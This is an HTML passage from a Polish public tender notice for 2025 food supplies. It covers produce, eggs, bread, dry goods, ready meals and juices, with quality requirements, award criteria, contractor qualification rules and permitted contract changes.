class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas wymiany towaru na pełnowartościowy lub na uzupełnienie braku w dostawie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Owoce i warzywa świeże i jajka .<br/>Zamawiający zamawia,a Wykonawca zobowiązuje się dostarczyć artykuły żywnościowe I<br/>gatunku w ilości , asortymencie i cenie określonej w załączniku do umowy , stanowiącym jej<br/>integralną część.<br/>Zamawiający zastrzega sobie prawo odbioru mniejszej ilości zamówionych produktów aniżeli<br/>określona jest w załączniku do umowy.<br/>Jednocześnie Zamawiający gwarantuje realizację umowy na poziomie 60% .<br/>Wykonawcy nie przysługują żadne roszczenia z tytułu niezrealizowania pozostałej części<br/>umowy, w szczególności z tytułu praw do zapłaty czy odszkodowania.<br/>Zamawiający zastrzega sobie prawo do żądania od Wykonawcy zwiększenia rozmiaru dostaw<br/>danego asortymentu kosztem odpowiedniego zmniejszenia ilościowego dostaw innego towaru,<br/>przy niezmienionej całkowitej wartości umowy.<br/>Wykonawca gwarantuje w szczególności , że dostarczone produkty będą :<br/>1) pierwszego gatunku , dopuszczone do obrotu zgodnie z obowiązującymi wymogami ,<br/>normami i atestami;<br/>2)świeże z datą przydatności do spożycia pozwalającą na prawidłowe wykorzystanie produktu;<br/>3) o właściwej gramaturze , czyste , bez objawów nadpsucia czy pleśni bez obcych zapachów ;<br/>4) dostarczane będą w nienaruszonym oryginalnym opakowaniu zawierającym informacje<br/>istotne ze względu na ochronę zdrowia lub życia człowieka ( skład produktu , datę przydatności<br/>do spożycia, dane identyfikujące producenta lub podmiot wprowadzający produkt do obrotu );<br/>5) przewożone będą w taki sposób , aby nie została naruszona ich jakość ;<br/>6) asortyment dostarczany będzie w sposób gwarantujący jego ochronę przed uszkodzeniami<br/>transportowymi ;<br/>CECHY DYSKWALIFIKUJĄCE DOSTARCZANE PRODUKTY TO W SZCZEGÓLNOŚCI:<br/>1) dla warzyw i owoców : zniekształcenia mechaniczne , oznaki choroby, zaparzenie , zgnicie ,<br/>zbyt przerośnięte , obce zapachy , pozostałości środków ochrony roślin.<br/>Jaja<br/>Jaja kurze klasy A , konsumpcyjne , Masa L - jaja o wadze jednostkowej od 63 do 73 gram<br/>Zamawiający zamawia, a Wykonawca zobowiązuje się dostarczyć artykuły żywnościowe I<br/>gatunku w ilości , asortymencie i cenie określonej w załączniku do umowy , stanowiącym jej<br/>integralną część.<br/>Zamawiający zastrzega sobie prawo odbioru mniejszej ilości zamówionych produktów aniżeli<br/>określona jest w załączniku do umowy.<br/>Jednocześnie Zamawiający gwarantuje realizację umowy na poziomie 60% .<br/>Wykonawcy nie przysługują żadne roszczenia z tytułu niezrealizowania pozostałej części<br/>umowy, w szczególności z tytułu praw do zapłaty czy odszkodowania.<br/>Zamawiający zastrzega sobie prawo do żądania od Wykonawcy zwiększenia rozmiaru dostaw<br/>danego asortymentu kosztem odpowiedniego zmniejszenia ilościowego dostaw innego towaru,<br/>przy niezmienionej całkowitej wartości umowy.<br/>Wykonawca gwarantuje w szczególności , że dostarczone produkty będą :<br/>1) pierwszego gatunku , dopuszczone do obrotu zgodnie z obowiązującymi wymogami ,<br/>normami i atestami;<br/>2)świeże z datą przydatności do spożycia pozwalającą na prawidłowe wykorzystanie produktu;<br/>3) o właściwej gramaturze , czyste , bez objawów nadpsucia czy pleśni bez obcych zapachów ;<br/>4) dostarczane będą w nienaruszonym oryginalnym opakowaniu zawierającym informacje<br/>istotne ze względu na ochronę zdrowia lub życia człowieka ( skład produktu , datę przydatności<br/>do spożycia, dane identyfikujące producenta lub podmiot wprowadzający produkt do obrotu );<br/>5) przewożone będą w taki sposób , aby nie została naruszona ich jakość ;<br/>6) asortyment dostarczany będzie w sposób gwarantujący jego ochronę przed uszkodzeniami<br/>transportowymi ;<br/>CECHY DYSKWALIFIKUJĄCE DOSTARCZANE PRODUKTY TO W SZCZEGÓLNOŚCI:<br/>1) dla jaj : roztrzaskane skorupki jaj , wgniecenia , pęknięcia skorupki , zepsucie </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas wymiany towaru na pełnowartoścowy lub na uzupełnienie braku w dostawie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pieczywo i wyroby piekarskie.<br/>Zamawiający zamawia,a Wykonawca zobowiązuje się dostarczyć artykuły żywnościowe I gatunku w ilości , asortymencie i cenie określonej w załączniku do umowy , stanowiącym jej<br/>integralną część.<br/>Zamawiający zastrzega sobie prawo odbioru mniejszej ilości zamówionych produktów aniżeli<br/>określona jest w załączniku do umowy.<br/>Jednocześnie Zamawiający gwarantuje realizację umowy na poziomie 60% .<br/>Wykonawcy nie przysługują żadne roszczenia z tytułu niezrealizowania pozostałej części<br/>umowy, w szczególności z tytułu praw do zapłaty czy odszkodowania.<br/>Zamawiający zastrzega sobie prawo do żądania od Wykonawcy zwiększenia rozmiaru dostaw<br/>danego asortymentu kosztem odpowiedniego zmniejszenia ilościowego dostaw innego towaru,<br/>przy niezmienionej całkowitej wartości umowy.<br/>Wykonawca gwarantuje w szczególności , że dostarczone produkty będą :<br/>1) pierwszego gatunku , dopuszczone do obrotu zgodnie z obowiązującymi wymogami ,<br/>normami i atestami;<br/>2)świeże z datą przydatności do spożycia pozwalającą na prawidłowe wykorzystanie produktu;<br/>3) o właściwej gramaturze , czyste , bez objawów nadpsucia czy pleśni bez obcych zapachów ;<br/>4) dostarczane będą w nienaruszonym oryginalnym opakowaniu zawierającym informacje<br/>istotne ze względu na ochronę zdrowia lub życia człowieka ( skład produktu , datę przydatności<br/>do spożycia, dane identyfikujące producenta lub podmiot wprowadzający produkt do obrotu );<br/>5) przewożone będą w taki sposób , aby nie została naruszona ich jakość ;<br/>6) asortyment dostarczany będzie w sposób gwarantujący jego ochronę przed uszkodzeniami<br/>transportowymi ;<br/>CECHY DYSKWALIFIKUJĄCE DOSTARCZANE PRODUKTY TO W SZCZEGÓLNOŚCI:<br/>1) dla pieczywa: pieczywo zdeformowane , zgniecione ,uszkodzone mechanicznie , pieczywo<br/>zabrudzone ,spalone , miękki , lepki ,niedopieczony z zakalcem z obecnością grudek mąki i soli ,<br/>smak gorzki , kwaśny , zbyt słony lub niesłony , ciasta zabrudzone ,spalone, niedopieczone , o<br/>wyraźnie niewłaściwej porowatości ciasta , kruszące się , objawy pleśnienia . psucia ,<br/>uszkodzenia mechaniczne , ciasta zdeformowane , zgniecione , porozrywane, obecność szkodników oraz ich pozostałości . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas wymiany towaru na pełnowartościowy lub na uzupełnienie braku w dostawie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Artykuły różne spożywcze , sypkie , drobne i przyprawy<br/>Zamawiający zamawia,a Wykonawca zobowiązuje się dostarczyć artykuły żywnościowe I<br/>gatunku w ilości , asortymencie i cenie określonej w załączniku do umowy , stanowiącym jej<br/>integralną część.<br/>Zamawiający zastrzega sobie prawo odbioru mniejszej ilości zamówionych produktów aniżeli<br/>określona jest w załączniku do umowy.<br/>Jednocześnie Zamawiający gwarantuje realizację umowy na poziomie 60% .<br/>Wykonawcy nie przysługują żadne roszczenia z tytułu niezrealizowania pozostałej części<br/>umowy, w szczególności z tytułu praw do zapłaty czy odszkodowania.<br/>Zamawiający zastrzega sobie prawo do żądania od Wykonawcy zwiększenia rozmiaru dostaw<br/>danego asortymentu kosztem odpowiedniego zmniejszenia ilościowego dostaw innego towaru przy niezmienionej całkowitej wartości umowy.<br/>Wykonawca gwarantuje w szczególności , że dostarczone produkty będą :<br/>1) pierwszego gatunku , dopuszczone do obrotu zgodnie z obowiązującymi wymogami ,<br/>normami i atestami;<br/>2)świeże z datą przydatności do spożycia pozwalającą na prawidłowe wykorzystanie produktu;<br/>3) o właściwej gramaturze , czyste , bez objawów nadpsucia czy pleśni bez obcych zapachów ;<br/>4) dostarczane będą w nienaruszonym oryginalnym opakowaniu zawierającym informacje<br/>istotne ze względu na ochronę zdrowia lub życia człowieka ( skład produktu , datę przydatności<br/>do spożycia, dane identyfikujące producenta lub podmiot wprowadzający produkt do obrotu );<br/>5) przewożone będą w taki sposób , aby nie została naruszona ich jakość ;<br/>6) asortyment dostarczany będzie w sposób gwarantujący jego ochronę przed uszkodzeniami<br/>transportowymi ;<br/>CECHY DYSKWALIFIKUJĄCE DOSTARCZANE PRODUKTY TO W SZCZEGÓLNOŚCI:<br/>1) dla produktów sypkich : produkty , które po obróbce termicznej zgodnej z opisem na<br/>opakowaniu ulegają rozgotowaniu , produkty które mają obce posmaki ,zapachy , których<br/>opakowanie nosi ślady naruszenia np. rozerwana torebka , wgniecenia na pudełku , obecność<br/>szkodników oraz ich pozostałości , brak oznakowania opakowań . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zas wymiany towaru na pełnowartościowy lub na uzupełnienie braku w dostawie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wyroby garmażeryjne , dania gotowe.<br/>Zamawiający zamawia, a Wykonawca zobowiązuje się dostarczyć artykuły żywnościowe I<br/>gatunku w ilości , asortymencie i cenie określonej w załączniku do umowy , stanowiącym jej<br/>integralną część.<br/>Zamawiający zastrzega sobie prawo odbioru mniejszej ilości zamówionych produktów aniżeli<br/>określona jest w załączniku do umowy.<br/>Jednocześnie Zamawiający gwarantuje realizację umowy na poziomie 60% .<br/>Wykonawcy nie przysługują żadne roszczenia z tytułu niezrealizowania pozostałej części<br/>umowy, w szczególności z tytułu praw do zapłaty czy odszkodowania.<br/>Zamawiający zastrzega sobie prawo do żądania od Wykonawcy zwiększenia rozmiaru dostaw<br/>danego asortymentu kosztem odpowiedniego zmniejszenia ilościowego dostaw innego towaru,<br/>przy niezmienionej całkowitej wartości umowy.<br/>Wykonawca gwarantuje w szczególności , że dostarczone produkty będą :<br/>1) pierwszego gatunku , dopuszczone do obrotu zgodnie z obowiązującymi wymogami ,<br/>normami i atestami;<br/>2)świeże z datą przydatności do spożycia pozwalającą na prawidłowe wykorzystanie produktu;<br/>3) o właściwej gramaturze , czyste , bez objawów nadpsucia czy pleśni bez obcych zapachów ;<br/>4) dostarczane będą w nienaruszonym oryginalnym opakowaniu zawierającym informacje<br/>istotne ze względu na ochronę zdrowia lub życia człowieka ( skład produktu , datę przydatności<br/>do spożycia, dane identyfikujące producenta lub podmiot wprowadzający produkt do obrotu );<br/>5) przewożone będą w taki sposób , aby nie została naruszona ich jakość ;<br/>6) asortyment dostarczany będzie w sposób gwarantujący jego ochronę przed uszkodzeniami<br/>transportowymi ;<br/>CECHY DYSKWALIFIKUJĄCE DOSTARCZANE PRODUKTY TO W SZCZEGÓLNOŚCI:<br/>1) dla dań gotowych - &#34; garmażerki &#34; : smaki kwaśny , gorzki , zbyt słony lub niesłony , obce<br/>posmaki zapachy , obce posmaki , zapachy , obecność szkodników , nalot pleśni ,<br/>niedopieczone. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15894300-4 - Dania gotowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zas wymiany towaru na pełnowartościowy lub na uzupełnienie braku w dostawie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Soki i musy jednodniowe owocowo - warzywne<br/>Sok - produkt otrzymany z dojrzałych , świeżych lub przechowywanych owców lub warzyw , jednego lub większej liczby gatunków . Posiadający barwę, smak i zapach charakterystyczny dla soku z owoców lub warzyw z których pochodzą , zdolny do fermentacji lecz niesfermentowany . Soki mogą być produkowane z zagęszczonych soków lub przecierów przez odtworzenie udziału wody usuniętej w procesie zagęszczenia soku lub przecieru i odtworzenie aromatu oraz , gdy jest to wskazane , miazgi usuniętej z soku, lecz odzyskanej w procesie technologicznym . Do soków zgodnie z przepisami krajowymi i unijnymi nie wolno dodawać konserwantów, barwników, słodzików i aromatów innych niż odzyskanych w procesie zagęszczenia soków i przecierów.Nie wolno dodawać żadnych substancji poprawiających smak , barwę lub konsystencję soku . Barwa , smak i aromat soku musi pochodzić z owoców lub warzyw , z których został otrzymany .W przepisach restrykcyjnie określono ilość i rodzaj dozwolonych dodatków do soków , tj. witamin, soli mineralnych , kwasów spożywczych. Do wszystkich soków owocowych oraz pomidorowego zabroniony jest dodatek cukrów ( cukru białego , syropu cukrowego , syropu glukozowo - fruktozowego , fruktozy , glikozy itd.) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15320000-7 - Soki owocowe i warzywne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zas wymiany towaru na pełnowartościowy lub na uzupełnienie braku w dostawie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1 ). Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania. Wzór oświadczenia stanowi Załącznik nr 3 do SWZ.<br/>2) Informacje zawarte w oświadczeniu , o którym mowa w pkt 1 stanowią wstępne potwierdzenie , że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu .<br/>3)Wymagane jest złożenie oferty oraz oświadczenia o których mowa w art. 125 ust 1 Ustawy Pzp w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym , podpisem zaufanym lub podpisem osobistym <br/>4) Oświadczenie o którym mowa w pkt 1 składają odrębnie .<br/>4.1) Wykonawca oraz każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia . W takim przypadku oświadczenie potwierdza brak podstaw do wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu.<br/>4.2) Podmiot udostępniający zasoby , na którego potencjał powołuje się Wykonawca , celem potwierdzenia spełnienia warunków udziału w postępowaniu . W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie , w jakim podmiot udostępnia swoje zasoby Wykonawcy.<br/>5)Do oferty wykonawca zobowiązany jest załączyć:<br/>5.1) - odpis lun informację z Krajowego Rejestru Sądowego , Centralnej Ewidencji i Informacji o Działalności Gospodarczej lun innego właściwego rejestru potwierdzającego , że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania lub wskazanie miejsca umożliwiającego dostęp do tych dokumentów.<br/>5.2)Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, gdy umocowanie osoby składajacej ofertę nie wynika z dokumentów opisanych w pkt. 5.1)<br/>5.3) Zobowiązanie , o którym mowa w rozdziale X , pkt. 3 do SWZ w przypadku polegania na zasobach podmiotu udostępniającego zasób Wykonawcy.<br/>5.4) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>a) pełnomocnictwo , w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia , z treści którego będzie wynikało umocowanie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego. pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>- postępowania o zamówienie publiczne którego dotyczy<br/>- wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby.<br/>Ustanowionego pełnomocnika z zakresu jego pełnomocnictwa <br/>b) Oświadczenie o którym mowa w rozdziale XI pkt. 5 ( Zamawiający dopuszcza złożenia tego oświadczenia na formularzu ofertowo - cenowym) ) , lub jako dodatkowy załącznik do oferty.<br/>6) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej , składa dokument lub dokumenty wystawione w kraju , w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio , że nie otwarto jego likwidacji ani nie ogłoszono upadłości .</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Umowa może być zmieniona w stosunku do złożonej oferty wyłącznie na niżej wymienionych warunkach:<br/>1.) W stosunku do wartości Umowy w razie zmiany urzędowej stawki podatku VAT - w celu dostosowania do aktualnie obowiązującej stawki , bez zmiany wartości netto wynagrodzenia wynikającego z umowy , jednak nie wcześniej niż po dacie rozpoczęcia jej obowiązywania . Nowa stawka VAT obowiązuje od dnia jej wprowadzenia zgodnie z powszechnie obowiązującymi przepisami prawa . Zmiana Umowy w tym zakresie może być wprowadzona na pisemny wniosek z każdej Stron .<br/>2). W zakresie zmiany terminu wykonania Przedmiotu umowy w przypadku wystąpienia nadzwyczajnych okoliczności niezależnych od |Stron , stanowiących obiektywną przeszkodę w wykonaniu przedmiotu umowy w terminie wskazanym w Umowie - wyłącznie o okres trwania przeszkody .<br/>3) zmiany numeru katalogowego producenta produktu;<br/>4) w razie przejściowego udokumentowanego braku możliwości dostawy produktu o nazwie<br/>handlowej wskazanej w ofercie Wykonawcy, Zamawiający dopuszcza dostawę produktu<br/>równoważnego odpowiadającego wymogom określonym przez Zamawiającego w opisie<br/>przedmiotu zamówienia. Każdorazowa dostawa równoważnego produktu we wskazanych<br/>okolicznościach wymaga uprzedniej pisemnej akceptacji Zamawiającego i nie wymaga zawarcia<br/>aneksu do umowy. Produkt równoważny zostanie Zamawiającemu dostarczony po cenie<br/>jednostkowej nie wyższej aniżeli cena produktu zawartego w ofercie Wykonawcy;<br/>5) stałego, czasowego lub dotyczącego konkretnej ilości obniżenia cen jednostkowych<br/>produktów na podstawie rabatów (upustów, itp.) udzielonych przez Wykonawcę. W przypadku<br/>stałego obniżenia ceny strony zawrą pisemny aneks do umowy. W przypadku czasowego lub<br/>dotyczącego konkretnej ilości produktów obniżenia ceny zmiana taka nie będzie wymagać<br/>sporządzenia pisemnego aneksu do umowy pod warunkiem, że udzielenie rabatu przez<br/>Wykonawcę będzie uwidocznione na fakturze lub załączonym dokumencie Wykonawcy, poprzez<br/>zawarcie informacji o wysokości rabatu. Potwierdzeniem takiej zmiany (przyjęciem rabatu) ze<br/>strony Zamawiającego będzie w takim przypadku zapłata faktury;<br/>6) tymczasowego dostarczania produktów w opakowaniach o innej ilości sztuk niż określona w<br/>ofercie Wykonawcy w przypadku braku dostępności na rynku produktów w opakowaniach o<br/>zaoferowanej wielkości, a cena jednostkowych sztuk produktów będzie nie wyższa niż określona<br/>w umowie, a ilość zgodna z zamówieniem;<br/>7) zmiany producenta produktów, w przypadku, gdy producent wskazany w ofercie przez<br/>Wykonawcę wycofał się z produkcji pod warunkiem, że produkty innego producenta w pełni<br/>spełniają wymogi wynikające ze Specyfikacji Warunków Zamówienia, a ich cena będzie nie<br/>wyższa 